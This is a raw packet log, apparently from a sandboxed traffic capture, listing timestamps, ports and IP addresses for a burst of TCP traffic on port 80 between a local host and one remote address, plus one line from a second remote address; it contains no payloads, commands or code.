Aug 31, 2024 15:44:11.563740015 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563743114 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563755035 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563759089 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563761950 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563771963 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563776016 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563790083 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563806057 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563806057 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563806057 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563817024 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563827991 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563838005 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563838005 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563865900 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563865900 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563888073 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563925982 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563936949 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563970089 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564016104 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564030886 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564042091 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564049006 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564054012 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564066887 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564083099 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564084053 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564146042 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564156055 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564165115 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564176083 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564177990 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564203024 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564299107 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564308882 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564317942 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564328909 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564335108 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564347982 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564392090 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564497948 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564507961 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564512968 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564517975 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564527035 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564538956 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564548969 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564593077 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564593077 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564713001 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564723969 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564729929 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564737082 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564753056 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564762115 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.564789057 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.564831018 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565007925 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565017939 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565027952 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565041065 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565066099 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565110922 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565114021 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565126896 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565140009 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565159082 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565171957 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565182924 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565186977 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565193892 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565202951 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565202951 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565206051 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565220118 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565223932 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565237999 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565243959 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565243959 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565248966 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565285921 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565285921 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565300941 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565311909 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565321922 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565331936 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565331936 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565355062 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565355062 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565385103 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565551996 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565620899 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565632105 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565646887 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565689087 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565699100 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565707922 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565709114 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565709114 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565726042 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565818071 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565968037 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.565979958 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.565990925 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566001892 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566014051 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566039085 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566046953 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566050053 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566061974 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566070080 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566088915 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566097975 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566097975 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566127062 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566158056 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566169977 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566180944 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566191912 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566204071 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566240072 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566247940 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566247940 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566251040 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566262960 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566273928 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566284895 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566312075 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566433907 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566556931 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566570997 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566582918 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566592932 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566647053 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566647053 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566823006 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566844940 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566854954 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566900015 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566910982 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566922903 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566934109 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566943884 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.566956997 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566993952 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.566993952 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.589844942 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589858055 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589874029 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589895010 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589904070 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589909077 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589926958 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589936018 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589941978 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.589941978 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.589951038 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589965105 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.589967966 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.589967966 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.589984894 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590003967 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590010881 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590010881 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590018034 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590029955 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590049982 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590059042 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590069056 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590081930 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590101004 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590105057 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590114117 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590126991 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590142965 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590162039 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590162992 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590209007 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590229034 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590244055 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590254068 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590272903 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590284109 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590291977 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590303898 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590303898 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590303898 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590315104 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590325117 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590332985 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590332985 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590343952 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590356112 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590364933 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590373039 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590373039 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590383053 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590394020 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590395927 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590408087 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590413094 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590424061 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590432882 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590437889 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590444088 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590449095 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590449095 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590456963 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.590486050 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590486050 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.590543032 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.639574051 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:11.651838064 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.651870966 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.651890993 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.651921988 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.651966095 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.651983976 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.651994944 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.651998043 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652013063 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652021885 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652025938 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652036905 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652040958 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652048111 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652060986 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652066946 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652077913 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652089119 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652097940 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652097940 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652098894 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652113914 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652117014 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652129889 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652139902 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652156115 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652169943 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652179956 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652199984 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652205944 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652220011 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652224064 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652224064 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652230978 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652244091 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652251959 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652262926 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652268887 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652276039 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652287006 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652291059 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652297974 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652313948 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652393103 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652404070 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652415991 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652421951 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652426004 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652439117 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652446985 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652467966 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652471066 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652503014 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652523994 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652846098 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652858019 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652868032 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652920008 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652923107 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652923107 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652932882 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652946949 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652957916 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652968884 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.652978897 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652978897 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.652987957 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653000116 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653002024 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653013945 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653021097 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653028011 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653038979 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653048992 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653058052 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653058052 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653091908 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653091908 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653114080 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653125048 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653265953 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653284073 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653305054 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653312922 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653321981 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653333902 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653346062 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653350115 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653357983 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653367996 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653383970 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653487921 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653506041 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653517008 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653517008 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653527021 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653541088 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653553963 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653557062 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653567076 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653570890 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653597116 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653784990 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.653898001 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653978109 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.653987885 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654006958 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654019117 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654030085 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654042006 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654046059 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.654053926 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654057026 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.654067993 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.654176950 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.654228926 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654238939 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654259920 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654284000 CEST	80	49717	185.215.113.26	192.168.2.5
